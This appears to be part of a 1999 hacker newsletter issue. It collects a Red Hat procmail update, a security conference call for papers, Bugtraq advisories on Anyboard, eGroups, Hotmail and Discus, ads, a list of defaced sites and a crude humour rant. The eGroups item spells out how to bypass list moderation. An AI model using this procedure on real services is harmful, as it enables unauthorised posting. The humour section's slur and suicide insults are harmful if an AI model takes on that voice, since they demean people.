___________________________________________________________________________
Dan Yocum | Phone: (630) 840-8525
Linux/Unix System Administrator | Fax: (630) 840-6345
Computing Division OSS/FSS | email: yocum@fnal.gov .~. L
Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I
P.O. Box 500 | // \\ N
Batavia, IL 60510 | "TANSTAAFL" /( )\ U
________________________________|_________________________________ ^`~'^__X_



------- Forwarded Message


Return-Path: redhat-watch-list-request@redhat.com
Received: from lists.redhat.com (lists.redhat.com [199.183.24.247])
by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19659
for <yocum@sapphire.fnal.gov>; Fri, 16 Apr 1999 04:28:25 -0500
Received: (qmail 15370 invoked by uid 501); 16 Apr 1999 09:45:57 -0000
Resent-Date: 16 Apr 1999 09:45:57 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:45:56 1999
Date: Fri, 16 Apr 1999 05:22:11 -0400 (EDT)
From: Cristian Gafton <gafton@redhat.com>
X-Sender: gafton@alien.devel.redhat.com
To: redhat-watch-list@redhat.com
Subject: SECURITY: new procmail packages available
Message-ID: <Pine.LNX.4.10.9904160521050.29655-100000@alien.devel.redhat.com>
Approved: ewt@redhat.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Resent-Message-ID: <"Q6ns4.0.Il3.JRm5t"@lists.redhat.com>
Resent-From: redhat-watch-list@redhat.com
Reply-To: redhat-watch-list@redhat.com
X-Mailing-List: <redhat-watch-list@redhat.com> archive/latest/18
X-Loop: redhat-watch-list@redhat.com
Precedence: list
Resent-Sender: redhat-watch-list-request@redhat.com
X-URL: http://www.redhat.com


Potential security problems have been identified in all the procmail
packages shipped with Red Hat Linux. Currently Red Hat is not aware of any
explots built on these vulnerabilities.


Red Hat would like to thank the members of the Bugtraq list for reporting
these problems and the authors of procmail for quickly providing an update.


Users of Red Hat Linux are recommended to upgrade to the new packages
available under updates directory on our ftp site:


Red Hat Linux 5.0,5.1 and 5.2:
==============================


alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/procmail-3.13.1-1.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/procmail-3.13.1-1.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/procmail-3.13.1-1.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/procmail-3.13.1-1.src.rpm


Red Hat Linux 4.2:
==================


alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/procmail-3.13.1-0.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/procmail-3.13.1-0.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/procmail-3.13.1-0.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/procmail-3.13.1-0.src.rpm


Cristian
- --
- ----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly. It's just selective about who its friends are.



- --
To unsubscribe: mail redhat-watch-list-request@redhat.com with
"unsubscribe" as the Subject.



------- End of Forwarded Message


--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------


To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null

@HWA

40.0 Final call for papers for CQRE (Secure)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Return-Path: <firewalls-owner@lists.gnac.net>
Received: from secunet.de (huehnlein.cubis.de [10.0.129.33]) by stax05.cubis.de (8.7.5/8.7.3) with ESMTP id PAA02374; Fri, 23 Apr 1999 15:04:16 +0200 (MET DST)
Message-ID: <37207D2C.B78F8881@secunet.de>
Date: Fri, 23 Apr 1999 15:01:16 +0100
From: "Detlef Hühnlein" <huehnlein@secunet.de>
Organization: Secunet GmbH - The Trust Company
X-Mailer: Mozilla 4.03 [en] (WinNT; I)
MIME-Version: 1.0
To: "cqre@secunet.de" <cqre@secunet.de>
Subject: Final Call for Papers - CQRE [Secure] networking
Content-Type: text/plain; charset=iso-8859-1
X-MIME-Autoconverted: from quoted-printable to 8bit by beasley.paix.gnac.net id HAA10953
Sender: firewalls-owner@lists.gnac.net
Precedence: bulk
X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id MAA23257


Hallo!


Please accept my sincere appologies, if you receive this
Final Call for Papers multiple times.


The mail is just to remind you that there are only !!! THREE !!!
more weeks until the deadline for submission of extended
abstracts on May 14th, 1999.


Recent news:
* best paper award at CQRE
* publication of proceedings in Springer's LNCS
* first invited speakers:
- Stephen Kent (GTE)
- Bruce Schneier (Counterpane)
- Helena Handschuh (Gemplus/ENST)


Best regards
Detlef Huehnlein


***************************************************************
Final Call for Papers
CQRE [Secure] Congress & Exhibition
Duesseldorf, Germany, Nov. 30 - Dec. 2 1999
---------------------------------------------------------------
provides a new international forum covering most aspects of
information security with a special focus to the role of
information security in the context of rapidly evolving
economic processes.
---------------------------------------------------------------
Deadline for submission of extended abstracts: May 14, 1999
CQRE - website: http://www.cqre.net (under construction)
CfP - at: http://www.secunet.de/forum/cqre.html
mailing-list: send mailto:cqre@secunet.de
(where the subject is "subscribe" without paranthesis)
***************************************************************
The "CQRE [Secure] networking" provides a new international
forum giving a close-up view on information security in the
context of rapidly evolving economic processes. The
unprecedented reliance on computer technology transformed
the previous technical side-issue "information security" to
a management problem requiring decisions of strategic
importance. Hence, the targeted audience represents decision
makers from government, industry, commercial, and academic
communities.


If you are developing solutions to problems relating to the
protection of your country´s information infrastructure or
a commercial enterprise, consider submitting a paper to the
"CQRE [Secure] networking" conference.


We are looking for papers and panel discussions covering:


* electronic commerce
- new business processes
- secure business transactions
- online merchandising
- electronic payment / banking
- innovative applications
* network security
- virtual private networks
- security aspects in internet utilization
- security aspects in multimedia applications
- intrusion detection systems
* legal aspects
- digital signatures acts
- privacy and anonymity
- crypto regulation
- liability
* corporate security
- access control
- secure teleworking
- enterprise key management
- IT-audit
- risk / disaster management
- security awareness and training
- implementation, accreditation, and operation of secure systems
in a government, business, or industry environment
* security technology
- cryptography
- public key infrastructures
- chip card technology
- biometrics
* trust management
- evaluation of products and systems
- international harmonization of security evaluation criterias
* standardization
* future perspectives


Any other contribution addressing the involvement of IT security
in economic processes will be welcome.


Authors are invited to submit an extended abstract of their
contribution to the program chair. The submissions should be
original research results, survey articles or "high quality"
case studies and position papers. Product advertisements are
welcome for presentation, but will not be considered for the
proceedings. Manuscripts must be in English, and should not be
more than 2.000 words. The extended abstracts should be in a
form suitable for anonymous review, with no author names,
affiliations, acknowledgements or obvious references.
Contributions must not be submitted in parallel to any conference
or workshop that has proceedings. Separately, an abstract of
the paper with no more than 200 words and with title, name and
addresses (incl. an E-mail address) of the authors shall be
submitted. In the case of multiple authors the contacting
author must be clearly identified. We strongly encourage
electronic submission in Postscript format. The submissions
must be in 11 pt format, use standard fonts or include the
necessary fonts. Proposals for panel discussions should also be
sent to the program chair. Panels of interest include those that
present alternative/controversial viewpoints or those that
encourage lively discussions of relevant issues. Panels that
are collections of unrefereed papers will not be considered.


Panel proposals should be a minimum of one page describing the
subject matter, the appropriateness of the panel for this
conference and should identify participants and their respective
viewpoints.


best paper award:
This award will be presented at CQRE to the authors of the best
paper to be selected by the program committee.


mailing list/ web-site:
If you want to receive emails with up to date information, please
send a brief mail to cqre@secunet.de. You will find this call for
papers and further information at http://www.secunet.de/forum/cqre.html.


publication:
The proceedings will be published by Springer-Verlag in the Lecture
Notes of Computer Science (LNCS) Series. The final papers must be
prepared as described in http://www.springer.de/comp/lncs/authors.html.


important dates:
deadline for submission of extended abstracts May 14, 1999
deadline for submission of panel proposals June 1, 1999
notification of acceptance June 25, 1999
deadline for submission of complete papers July 30, 1999




program committee:
Johannes Buchmann (TU Darmstadt)
Dirk Fox (Secorvo)
Walter Fumy (Siemens)
Ruediger Grimm (GMD)
Helena Handschuh (ENST/Gemplus)
Thomas Hoeren (Uni Muenster)
Pil Joong Lee (POSTECH)
Alfred Menezes (U.o.Waterloo/Certicom)
David Naccache (Gemplus)
Clifford Neumann (USC)
Joachim Posegga (German Telekom)
Mike Reiter (Bell Labs)
Matt Robshaw (RSA)
Richard Schlechter (EU-comm.)
Bruce Schneier (Counterpane)
Tsuyoshi Takagi (NTT)
Yiannis Tsiounis (GTE Labs)
Michael Waidner (IBM)
Moti Yung (CERTCO)
Robert Zuccherato (Entrust)


program chair:
Rainer Baumgart
secunet - Security Networks GmbH
Weidenauer Str. 223 - 225
57076 Siegen
Germany


Tel.: +49-271-48950-15
Fax: +49-271-48950-50
R.Baumgart@secunet.de
-
[To unsubscribe, send mail to majordomo@lists.gnac.net with
"unsubscribe firewalls" in the body of the message.]

@HWA

41.0 Anyboard WWW board vulnerabilities.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

from http://www.net-security.org/

by BHZ, Sunday 25th Apr 1999 on 11:55 am CET
Yet another post from BugTraq. Draz Q published a short summary of problems with
a webrelated software in eurohack. Basicly it sounds pretty much like a common CGI
problem. It does not give user or root access, only the ability to fake/modify just
about anything showed by the program. However, in the parts left out by me Draz Q
mentiones a great many sites (including commercial sites) exposed to the
vulnarbility.


==================================================
Anyboard Forum Security Hazard - POSTED by draz Q.
==================================================
Anyboard by Netbula (www.netbula.com)

After using the Anyboard Forum at my own page (www.radikal.net/radikal)
for a while I've found a "little" (?) flaw in it that allows _anyone_ to
get the admin login and password. This is because the forum CFG file
is available to anyone.

This, allows anyone to,
- Delete messages in the forum (purge the whole forum)
- Modify messages
- Write messages as Admin
- Change admin login and password
- In short, do anything in the Message forum

@HWA

42.0 Egroups bug..
~~~~~~~~~~~~~
from http://www.net-security.org/

EGROUPS BUG
by BHZ, Sunday 25th Apr 1999 on 11:55 am CET
Philip Stoev reports to BugTraq about security flaw in eGROUPS. eGROUPS is a
web site providing mailing list services.The mailing lists (aka groups) can be
moderated, and the moderator can approve/revoke posted messages by sending
blank emails to certain addresses in the egroups system. This makes it trivial for
anyone to approve a message without being a moderator.

-=-

1. Take a look at the header of some previous message sent to the group.
Extract the following header line:

Return-Path: <GROUPNAME-return-XXX-USERNAME=HOST.TLD@returns.egroups.com>

the number XXX here is a sequence number assigned to each message sent to
the group.

2. Send the message you want to send to the list. The message will be sent
to the moderator for approval.

3. Send 256 blank messages to addresses like:

GROUPNAME-accept-ZZmYYY@egroups.com

Where
ZZ is a hexadecimal number from 00 to FF.
YYY is XXX + 1;

The presence of the ZZ number appears to be an attempt to put some security
into the entire system. However, this number is constant for each group and
does not change in time. Once guessed, subsequent messages can be approved
with a single email.

Your message will appear as if approved by the moderator and will be
distributed to the group. No header spoofing is necessary, because the
eGROUPS system does not check the source address of the incoming messages.

eGROUPS was notified exactly one week ago.

Philip Stoev

-Prepare for SAT & TOEFL at http://studywiz.hypermart.net
=This message was sent by Philip Stoev (philip@einet.bg)
=tel: (359 2) 715949, ICQ: 23465869

@HWA

43.0 Ok lets see some I.D (biometrics)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Sysadmin@kktv.com


Okay, Let's See Some ID
by Jeffery Zbar


As corporations dispatch legions of teleworkers to remote sites and home
offices, how can they ensure that a user logging on to the company network
isn't an imposter who's cracked the teleworker's password? Increasingly,
the answer is with biometrics - a security scheme that verifies a user's
identity based on a physical characteristic such as a fingerprint or a
signature.


Biometric scanners don't actually store any personal information.
Instead, they collect and check algorithmic characteristics unique to you,
whether the look of your face or the rhythm of your typing. Although the
government and financial institutions have used biometrics since the
1970s, the corporate sector is catching up - particularly with
telecommuters being "pushed to [adopt] security technology to ensure
they're not hacked through the back door,"
says Erik Bowman, and analyst
with Bethesda, Md.-based CardTech/SecurTech (www.stst.com), publisher of
ID Word, a trade publication.


A new generation of low-cost, plug-and-play products is helping make
biometrics one of the top 10 technologies to watch in 1999, according to a
Gartner Group report, with some analysts predicting widescale deployment
as early as 2001. A spokesperson for the fingerprint scanner vendor
Identicator Technology predicts this year "we'll see this technology
securing laptops, PDAs, and cell phones. It's just a matter of time
before we will open our cars and homes with biometrics."



We found 14 companies at work developing a wide array of desktop biometric
products (prices range from $50 to $400). Most scan fingerprints, but
here's a quick rundown, including devices that pinpoint other distinctive
features.


Eyes


IriScan (iriscan.com): PC Iris, a handheld scanner that identifies the
pattern in the eye's iris; available this spring.



Fingerprints


Advanced Precision Technology Inc. (www.aprint.com):
a smart card that stores a hologram image of a fingerprint scan;


American Biometric Co. (www.abio.com):
BioMouse Plus, an optical fingerprint imager;


Biometric Access Corp. (www.biometricaccess.com):
Secure Touch 98, an optical fingerprint imager;


Biometric Identification Inc. (www.biometricid.com):
a full line of VeriPrint fingerprint imagers (starting
at $700);


Digital Persona (www.dpersona.com):
U.are.U fingerprint scanner and software packages;


Identicator (www.identicator.com):
Fingerprint Identification Technology-based
optical fingerprint scanners, available through
Compaq;


Veridicom (www.veridicom.com):
the FPS100, a finger-imaging sensor the size of a postage stamp.



Faces


Biometric Access Corp.:
One-One-One Facial generates a digital "facial signature"
matched against a stored signature;


Miros (www.miros.com):
TrueFace facial verification software works with popular
videoconferencing cameras;


Visionics (www.faceit.com):
FaceIt facial verification software, also for popular
videoconferencing cameras.



Keystrokes


Net Nanny BioPassword (www.netnanny.com):
monitors your PC keyboard to measure the precise timing
and fluctuations between keystrokes while typing a
password phrase.



Signatures


Cyber-Sign (www.cybersign.com):
software that recognizes swirls and other characteristics
in a handwritten signature.



Voices


Keyware Technologies (www.keywareusa.com):
partering with ST Microelectronics on a voice
verification system that tracks a spoken word code;
due in July.



-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

44.0 Javascript hotmail password trap
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
X-Mailer: Mozilla 4.51 [en] (X11; I; Linux 2.0.36 i586)
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3720C21C.B5D5E670@kasey.umkc.edu>
Date: Fri, 23 Apr 1999 13:55:24 -0500
Reply-To: "David L. Nicol" <david@KASEY.UMKC.EDU>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: "David L. Nicol" <david@KASEY.UMKC.EDU>
Organization: University of Missouri - Kansas City network operations
Subject: javascript hotmail password trap
To: BUGTRAQ@netspace.org


Hello, I was informed this morning that a free form data mailer
I maintain (http://www.tipjar.com/generic.html) was being involved
in a javascript-based hotmail password stealing scheme.


I have located the originating page (with the script) and sent it
to the contact address hotmail puts on their autoresponder documents.


I will share an URL for the (fully escaped) exploit in a week or two,
to give hotmail time to patch their systems. (that's correct procedure,
right?)


So far the perp has a few dozen passwords (and I've got them too,
they appear in my apache server log)


I have offered to send hotmail the list. As there are many free form
data mailers around, I am not making any modifications to my tool (which
is performing correctly) which would chase the password trapper to
another form mailer whose admin does not keep as good of logs.


The page with the script on it contains a warning that your password
has just been trapped; so unless there are other copies of this script
running around all the victims know it already.

@HWA

45.0 Discus web based discussion software advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
X-Sender: hhp@ns.suspend.net
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.10.9904231317160.5052-100000@ns.suspend.net>
Date: Fri, 23 Apr 1999 22:34:08 -0400
Reply-To: hhp@NS.SUSPEND.NET
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
Subject: Discus advisory.
To: BUGTRAQ@netspace.org
In-Reply-To: <3720E2B6.6031A2E7@datashopper.dk>


(hhp) Discus advisory. (hhp)
---------------------------------------------------
Discus (Free discussion for your Web Site!)
at http://www.chem.hope.edu/discus/ has a directory
and file permission problem. The code is really
messy and they need to learn file and permission
operations better. The source determines the mode
of the directories and files from other sources:
Line: 533 in discus3_01/source/src-board-setup
which is a totally bad idea being that no matter
what, the private files should not be +r... ie,
the *.txt's and so on. I contacted the software
programmers and hope they recognize this problem
being that the files are so open and easy to find
with any public search engines. I noticed quite a
few servers are using this software and I would
guestimate about 80% or more are vulnerable to
getting thier userfile cracked and their server
rooted.
So my suggestion to people using this
software is check your modes or either wait for a
new release of the software. I did not want to get
into making a patch being that they need to totally
redo some of their methods.


elaich - 2:30:15am CST 4/24/1999
--------------------------------------------
elaich of the hhp.
Email: hhp@hhp.hemp.net / pigspigs@yahoo.com
Voice: 1800-Rag-on-gH pin: The-hhp-crew
Web: http://hhp.hemp.net
--------------------------------------------

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************

<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx

http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="
http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*


Contributed by Merlock

You Know You're In Design Hell When You See...


"
This page is designed for 1600x1200 resolution"
Who the fuck designs web pages for resolutions that high? Get a clue
jocko,
Most people can't even view that high... and those that can need a
microscope on their
15"
monitors.


blinking text
Blinking text makes it nearly impossible to pay attention to
anything
else on the page. It reduces 87% of all surfers to a helpless state of
fixated brain-lock, much like that of a rabbit caught in the headlights
of an oncoming semi. This is not good. If you abuse the blink tag, you
deserve to be shot. Clue: if you use the blink tag, you're abusing it.


gratuitous animation
With animations you get the all the wonderful injuries of the blink
tag with the added insult of the graphics download time. People who
abuse these should have flip books rammed into every body orifice until
they figure out that a two- or
three-frame graphics loop is even less pleasant than that.


marquees
So, maybe you think the blink tag and cheesy animations are the worst
abuse half-bright websmiths can perpetrate on your retinas? Naaahhhhh.
For those times when too much is just not enough, the Great Satan of
Redmond has given us <MARQUEE>, which allows you to create animated
scrolling marquees at the drop of an angle bracket. This bastard cousin
of the blink tag can cause
vertigo and seizures in susceptible individuals, reducing them to
exactly that state of drooling lobotomized idiocy that's such an
essential prerequisite to purchasing Microsoft products. Coincidence? We
think not.


garish backgrounds
The very next time we stumble across a page composed by somebody
who thinks it's cool to use leaping flames or a big moire pattern or
seven shades of hot pink swirly as a background, we swear we are going
to reach right through the
screen and rip out that festering puke's throat. If there's a worse
promoter of eyestrain and migraines than the blink tag, this is it.


unreadable text/background combinations
The world is full of clowns who think their text pages look better
in clown makeup, clashing colors galore (your typical garish-background
idiot also pulls this one a lot). The magic words these losers need to
learn are "luminance contrast". Your color sense is between you and the
Gods of Bad Taste, but if you don't stick to either light text on dark
backgrounds or the reverse, you will drive away surfers who like to be
able to read without noticing the effort.


brushscript headings
Brushscript headings are rude. Unless, that is, you think every
single surfer hitting your page truly craves the opportunity to hang out
long enough to watch toenails grow while a brushscript GIF downloads
just to display a heading you could
have uttered in a nice, tasteful, fast font.


"resize your browser to..." instructions
Right. As if we wanted our browsers to take up that big a chunk of
screen real estate. But what's really annoying is that most of the time
these bozos get it wrong. Like, their browser has an 8-pixel offset,
ours eats 20, and they forgot to
allow for scroll bars so they're off by at least 30 pixels anyway and
the display graphics are complete garbage.


You Know You're In Content Hell When You See...


hit counters
"You are the 2,317th visitor to this page." Yeah, like we care. On
Yahoo's and Alta Vista's web it takes no effort at all to find and
bounce off every page on the planet with a reference to (say) credenzas
or toe jam. In this brave new world,
hit counters are nothing but a particularly moronic form of ego display,
impressing only the lemming-minded. They may tell you how many people
got suckered into landing on a glitzy splash page, but they won't even
hint how many muttered
"losers!" and surfed out again faster than you can say "mouse click". To
add injury to insult, hit counters screw up page caching, heaping more
load on the Internet's wires.


stale links
Stale links are lame. People who have lots of stale links are
lamers. OK, everybody has a pointer vaporize on them once in a while --
but haven't you noticed that stale links generally show up on a page in
swarms, like cockroaches? That's because people with good web pages use
them and hack them and fix broken pointers quickly so they're unlikely
to have more than one at a
time busted. A page with lots of stale links yells "My author is a lazy,
out-of-it loser with the attitude of a slumlord running a cockroach
palace."



images loading on other servers
Mostly done by geoshities bastards who cant spring for the real
webserver.
OK, we realize you cant get much for free these days, but does that give
you liscense
to clog someone else's server with your site traffic? NO. You want to
put that 512k image
of Pamela Lee's boobs (before the implants came out) on your site?
Fine... just pay the
cash to get your own space.


pages forever under construction
Surfers learn quickly that for every ten "under construction" signs
that go up, maybe two will ever come down before the heat-death of the
Universe. This is stupid. HTML is not rocket science and prototyping
pages is not a slow process. Anybody who can't find the time to clean
the construction signs off their pages should yank them and take up a
hobby better matched to their
abilities, like (say) drooling, staring at the wall, or picking the bugs
out of their hair.


You Know You're In Style Hell When You See...


pointless vanity pages
If we had a nickel for every home page we've seen that's a
yawn-inducing variation on "Hi, here's me and here's a cute picture of
my dog/cat/boyfriend/girlfriend"
we could retire to Aruba with a bevy of
supermodels tomorrow. Clue: if you don't have something to say, shut up.
And keep it off the Web; life is too short for boredom.


angst and pretentiousness
We were originally going to vent our spleen at black backgrounds,
until we realized that black is not the problem. It's the three
overlapping populations of losers that compose 99% of the black
backgrounds on the Web that are the problem. These are (a)
cooler-than-thou art fags, (b) angst-ridden adolescents, and (c) the
kind of coffeehouse trendoids who actually believe subscribing to Wired
makes them hip. Clue: angst and pretentiousness are boring. People who
spew bad poetry and/or make a fetish of writing in all-smalls and/or
traffic in fuzzy images of mediocre
avant-garde art should slit their wrists or join a commune or do
anything else that will keep their self-indulgent sludge off the Web.


corporate logorrhea
We've all seen them -- corporate pages that start by downloading
some monster logo graphic from hell. And after you've waited a million
or three years for it to finish, the rest of the page has a ton of gush
about how wonderful the company is, maybe some lame-oid promotion that's
just a hook to get you on their mailing list, and no content at all. Tip
for marketroids: this is not effective, unless your goal is to make the
company look like every other moronic me-too outfit that thinks having a
Web address will make it look like it has some semblance of a clue. Not!


advertisements from hell
Don't you love top of the page ads that are changed every time the
page is accessed? If you're jumping back and forth between a parent page
and a child devoted to a subcategory, you get the dubious pleasure of
waiting for a new ad
graphic to load each time!


no email address for feedback
These folks want you to look and listen to them, but they don't
want to hear from you. Isn't it interesting that half the Web pages of
Fortune 500 companies, the big names like McDonald's, won't tell you
what their email address is? Shows you just how much these gutless
wonders really value their customers. Another tip for marketroids: this
sort of thing makes your company look exactly as arrogant, stupid, and
indifferent to its customers as it actually is. Think of an email
feedback address as a sort of necessary disguise.


You Know You're In Extension Hell When You See...


broken HTML
A lot of broken HTML gets inflicted on the world because it happens
to get past the brain-damaged `parser' of everyone's favourite bloatware
web browser. The designer gets the perversity prize if he can provoke
radically different behaviour in different browsers or browser versions.


unstable extensions
We just love it when our browser freezes while loading a page,
hangs for a while, and then ignominiously coredumps. When this happens,
you can bet money the page is using a Netbloat extension nobody ever
bothered to debug properly
(there are a semi-infinite number of these). The worst offender is
undoubtedly...


frames
Frames are for idiots. They flat don't work on many browsers, and
core-dump many they're theoretically supposed to work in. They eat up
precious screen space with frame widget cruft. And, used with sufficient
ingenuity, they make it almost impossible to work out where you've been
and how to get back to where you got there from.


java applets
For those who truely want to piss off the 28.8 modem user. These
things
barely work in a 3.x browser, and when they do... 5 years later, you are
finally staring at the damn rotating cube in front of your face and ask
"why?" Hey lamers, get a clue and start writting REAL programs in C


@HWA

HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~

To be continued (probably) in a future issue... if time permits
and inclination is prevelant. ie: if & when I feel like it.. :p
(discontinued until further notice)

Meanwhile read this:

http://www.nmrc.org/faqs/hackfaq/hackfaq.html
<a href="http://www.nmrc.org/faqs/hackfaq/hackfaq.html"
>Link</a>
And especially, this:

http://www.tuxedo.org/~esr/faqs/hacker-howto.html
<a href="http://www.tuxedo.org/~esr/faqs/hacker-howto.html">Link</a>
(published in its entirety in issue #12)

@HWA


SITE.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

April 19th from HNN rumours section:

Cracked
Some folks had a busy weekend. The following sites
have been reported as cracked.
http://www.conamed.gob.mx
http://www.flyfishboats.com
http://www.videosonsale.com/
http://www.cdmusicsales.com/
http://www.bestcreditcards.com/
http://www.allcreditcards.com/
http://www.fixyourcreditnow.com/
http://www.bestphoneplans.com/
http://orac.sunderland.ac.uk/
http://www.knox.net
http://www.towngreen.com - Again
http://www.fjr.com
http://www.classicsystems.ca/
http://www.kose.net
http://www.flyufos.com
http://www.thelovezone.com
http://www.waterwarez.com

@HWA

April 20th from HNN rumours section

contributed by Anonymous
Russians on the Prowl
There seems to be a increase in cracks of US military sites originating from
Russia. With the recent anti-US stance of President Boris Yelstin in regards
to the NATO bombings of Kosovo many Russian crackers are not fearful of
prosecution by US authorities. Some recent cracks include the Commander of
Naval Forces in Guam (www.guam.navy.mil), the Military District of Washington
(mdw-www.army.mil), the Joint Tactical Unmanned Aerial Vehicle Project
(www.jtuav.redstone.army.mil) and the Department of Navy Acquisition Reform
(www.acq-ref.navy.mil). We where able to grab a mirror of yesterdays crack of
the Anniston Army Depot (www-anad.army.mil).

Cracked page archive:
http://www.hackernews.com/archive/crackarch.html

April 20th

